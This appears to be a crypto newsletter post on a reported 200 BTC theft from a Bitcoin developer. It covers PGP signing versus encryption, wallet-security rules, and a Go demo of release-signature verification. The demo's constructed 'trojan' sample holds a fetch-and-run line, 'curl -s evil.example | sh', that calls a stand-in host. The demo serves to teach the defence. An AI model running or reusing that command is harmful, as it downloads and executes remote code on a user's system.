2nd January 2023 | Security
Updated: Jan 12, 2023
tl;dr
A sobering story to start 2023. Take note and take action if required.
Market Snap
Market Wrap
That’s a mighty move in perpetual futures funding rates overnight, for reasons that escape me. Bears must heed the possibility of a short squeeze and forced liquidations.
Curious Cryptos’ Commentary — Make security paramount in 2023
A sobering story to start the year which I hope will encourage everyone to think harder and act smarter when it comes to the security of your crypto stash.
Luke Dashjr is a bitcoin core developer who has been working on BTC code for several years. He clearly knows a thing or two about BTC and must surely be well-versed in the use and storage of private keys.
Or one would think so.
He has claimed that on December 31st, 2022, he had over 200 BTC stolen from cold storage, currently worth over $3.3mm. That is a bad ending for him to what has been a bad year for cryptos.
Though details remain sketchy, my understanding from various Twitter discussions (Luke is famous in the BTC world so his loss has garnered a great deal of attention), goes something like this.
A month ago Luke downloaded some code from github.io or wherever but did not PGP (Pretty Good Privacy) verify that code. PGP is a public key/private key cryptography tool, a concept familiar to all crypto enthusiasts, and it does two distinct jobs: encryption and digital signatures. The encryption side is often used to send emails that even if intercepted cannot be read by a third party, a highly useful and desirable outcome for dissidents or opponents of oppressive dictatorial regimes including such luminaries as Russia and China.
For BTC, a transaction moving coins from one wallet to another is signed with the sending wallet’s private key, and nothing about it is encrypted: the transaction itself is public. Its validity is proved by checking that signature against the sender’s public key (the wallet address is derived from that public key, and the spending transaction reveals it), which anyone on the network can do.
For PGP encryption, the sender of an email uses the recipient’s public key to encrypt the contents, and only the holder of the matching private key can decrypt it. That is the mirror image of signing: encryption is done with the public key and undone with the private key, whereas signing is done with the private key and checked with the public key.
It is the signing side that proves the validity of open source code. The maintainer signs a release (in practice usually a file of SHA-256 checksums) with their PGP private key; you verify that signature with their published public key, then check that what you downloaded matches the signed checksum, before you run anything.
Long story short, Luke downloaded some code which had been maliciously changed to compromise his PGP private keys, an irony which should not be lost on anyone.
At some point between downloading that malicious code and two days ago, Luke used PGP to encrypt his crypto private keys. Anyone with access to his PGP private keys then had immediate access to his crypto private keys, with the entirely predictable outcome that his BTC has been stolen, presumably soon to end up in a mixer.
…
There are several lessons we can learn from this sad story.
Lesson number one – use PGP verification whenever downloading open source code, which is an oft-used conduit for malware. Verify against a signing key you obtained separately and earlier (a fingerprint printed in the project’s documentation, or a key you have held for years), not one sitting next to the download: whoever can tamper with the code can just as easily swap the key published beside it.
Lesson number two – do not store crypto private keys on an internet-connected device, as this makes them vulnerable to hacking and phishing attacks (note that tangentially this is one of the key reasons why we recommend Ledger Nano over Trezor).
Lesson number three – depending on the size of your crypto stash, you should consider extending the number of unique hardware wallets under your control.
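The signing relationship described above (a private key signs, the matching public key checks, and nothing is encrypted) together with the verification routine lesson one calls for, as an added example that is not code from this post or from any Bitcoin or PGP project. It uses Go’s standard-library Ed25519 in place of a PGP key so that it runs offline; the maintainer, the attacker, the release bytes and the “trojan” are all constructed for the example. The five scenarios at the end show why the check only means something when the public key came from somewhere other than the download itself.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Two distinct failures, both meaning "do not run this": a forged or untrusted signer,
// versus a download that does not match what was actually signed.
var (
	ErrBadSignature   = errors.New("signature does not verify under the trusted key")
	ErrDigestMismatch = errors.New("downloaded bytes do not match the signed digest")
)

// Signer is a release maintainer's key pair. Ed25519 stands in for a PGP key here:
// the private half stays with the maintainer, the public half is published.
type Signer struct {
	Pub  ed25519.PublicKey
	priv ed25519.PrivateKey
}

func NewSigner() (*Signer, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	return &Signer{Pub: pub, priv: priv}, nil
}

// Sign covers the SHA-256 digest of the release, which is what signing a SHA256SUMS
// manifest amounts to. Nothing is encrypted: release, digest and signature are all
// published in the clear, and anyone holding the public key can check them.
func (s *Signer) Sign(release []byte) (digest, sig []byte) {
	d := sha256.Sum256(release)
	return d[:], ed25519.Sign(s.priv, d[:])
}

// Verify is the downloader's side. trustedPub must come from somewhere other than the
// download itself (a key pinned long ago, a fingerprint from the project's docs);
// otherwise whoever replaced the code can equally replace the key sitting next to it.
func Verify(trustedPub ed25519.PublicKey, release, digest, sig []byte) error {
	if !ed25519.Verify(trustedPub, digest, sig) {
		return ErrBadSignature
	}
	actual := sha256.Sum256(release)
	if !bytes.Equal(actual[:], digest) {
		return ErrDigestMismatch
	}
	return nil
}

type DemoResult struct {
	Genuine         error // real release and signature, checked with the trusted key
	SwappedBinary   error // trojan shipped with the original digest and signature
	SwappedDigest   error // digest edited to match the trojan, signature left as is
	AttackerSigned  error // trojan re-signed by the attacker, checked with the trusted key
	AttackerKeyUsed error // same, but "checked" with the key found beside the download
}

// SupplyChainDemo replays the post's scenario on constructed data: a genuine release,
// a tampered copy, and an attacker who publishes their own key next to the download.
func SupplyChainDemo() (DemoResult, error) {
	maint, err := NewSigner()
	if err != nil { return DemoResult{}, err }
	attacker, err := NewSigner()
	if err != nil { return DemoResult{}, err }
	release := []byte("#!/bin/sh\necho 'wallet tool v1.0'\n")  // constructed sample
	trojan := []byte("#!/bin/sh\ncurl -s evil.example | sh\n") // constructed sample
	digest, sig := maint.Sign(release)
	tDigest := sha256.Sum256(trojan)
	aDigest, aSig := attacker.Sign(trojan)
	return DemoResult{
		Genuine:         Verify(maint.Pub, release, digest, sig),
		SwappedBinary:   Verify(maint.Pub, trojan, digest, sig),
		SwappedDigest:   Verify(maint.Pub, trojan, tDigest[:], sig),
		AttackerSigned:  Verify(maint.Pub, trojan, aDigest, aSig),
		AttackerKeyUsed: Verify(attacker.Pub, trojan, aDigest, aSig),
	}, nil
}

func main() {
	r, err := SupplyChainDemo()
	if err != nil {
		panic(err)
	}
	fmt.Println("genuine release, trusted key:       ", r.Genuine)
	fmt.Println("swapped binary, trusted key:        ", r.SwappedBinary)
	fmt.Println("swapped digest, trusted key:        ", r.SwappedDigest)
	fmt.Println("attacker-signed, trusted key:       ", r.AttackerSigned)
	fmt.Println("attacker-signed, attacker's own key:", r.AttackerKeyUsed)
}
```

The first four results are what a real `gpg --verify` plus `sha256sum --check` give you when the key was pinned in advance: only the genuine release passes. The fifth is the trap: the attacker’s signature verifies perfectly under the attacker’s key, so “the signature checked out” is meaningless unless you can say where the key came from.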
…
Which is all fine in theory, but how to put this into practice? Below I list our golden rules. I urge you to compare your security arrangements with these and make good any deficiencies you might spot. Please feel free to contact me with any specific questions, or indeed tailored advice.
1. Never store more than 5-10% of your crypto stash on a centralised cryptocurrency exchange, and then preferably only Coinbase or Binance.
2. Store 5-10% of your crypto stash in an online hot wallet, preferably MetaMask, for trading purposes (if that’s your thing) and interaction with DeFi (decentralised finance).
3. Store everything else supported by Ledger using a Ledger Nano, accessed through MetaMask where that is needed.
4. For coins not supported by Ledger consider whether the native wallet is more secure or not compared to leaving those coins as part of your centralised cryptocurrency exchange allocation.
5. Use a metal plate to store your recovery phrase (the seed words from which your private keys are derived) and keep it well hidden. Better still, use two metal plates, split the phrase into two parts, and store the plates in two very different places. Be aware of the trade-off: with a plain two-way split either plate lost or destroyed means the funds are gone, so each plate is irreplaceable, and half of a 12-word phrase leaves only six words (about 2^66 possibilities) unknown to whoever finds one plate, a far smaller margin than the full phrase, whereas half of a 24-word phrase leaves a much larger one. If you want redundancy as well as separation, a threshold scheme such as Shamir secret sharing (any two of three plates, say) gives both, at the cost of more plates to engrave and hide.
6. Have at least one back-up Ledger Nano stored securely elsewhere.
7. Consider your options as to how your crypto assets will be passed on in the unfortunate event of your untimely demise. At a minimum this requires extensive documentation of every exchange, wallet, and coin in your portfolio, accessible by your loved ones.
Specific steps related to these golden rules can be found in our free online training course.
As for which Ledger Nano, I am personally a big fan of the X due to its much greater memory storage (allowing use of many apps rather than deleting and reinstalling on a regular basis) and its Bluetooth connectivity to my iPad. I know some are concerned by the latter. If that is you, then stick with the S.
Next year will see the launch of Ledger Stax specifically designed for interaction with Web3. Stax also solves the problem of needing multiple hardware wallets for those with significant crypto assets. I look forward to reviewing it for readers of the CCC.